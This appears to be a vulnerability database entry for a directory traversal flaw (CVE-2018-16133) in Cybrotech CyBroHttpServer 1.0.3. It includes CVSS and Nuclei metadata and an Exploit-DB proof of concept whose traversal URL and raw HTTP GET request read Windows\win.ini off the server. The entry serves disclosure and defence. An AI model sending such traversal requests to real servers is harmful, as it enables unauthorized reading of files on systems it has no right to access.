Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal

vendor:

CyBroHttpServer

by:

Emre ÖVÜNÇ

5.3

CVSS

MEDIUM

Directory Traversal

CWE

Product Name: CyBroHttpServer

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: NO

Related CWE: CVE-2018-16133

CPE: cybrotech:cybrohttpserver:1.0.3

Metasploit:

Other Scripts:

Tags: lfi,packetstorm,cve,cve2018,cybrotech

CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Nuclei References: https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html, http://www.cybrotech.com/, https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal, https://nvd.nist.gov/vuln/detail/CVE-2018-16133

Nuclei Metadata: {'max-request': 1, 'vendor': 'cybrotech', 'product': 'cybrohttpserver'}

Platforms Tested: Windows

2018

Cybrotech CyBroHttpServer 1.0.3 – Directory Traversal

The Cybrotech CyBroHttpServer version 1.0.3 is vulnerable to directory traversal. An attacker can use this vulnerability to access files outside of the intended directory structure by manipulating the file path in the HTTP request.

Mitigation:

Update to a patched version of the software or apply appropriate security measures to prevent directory traversal attacks.

Source

Exploit-DB raw data:

# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
# Date: 2018-08-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE: CVE-2018-16133

# PoC
https://<host>\..\..\..\..\Windows\win.ini

# CVE-2018-16133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133
https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.png

GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1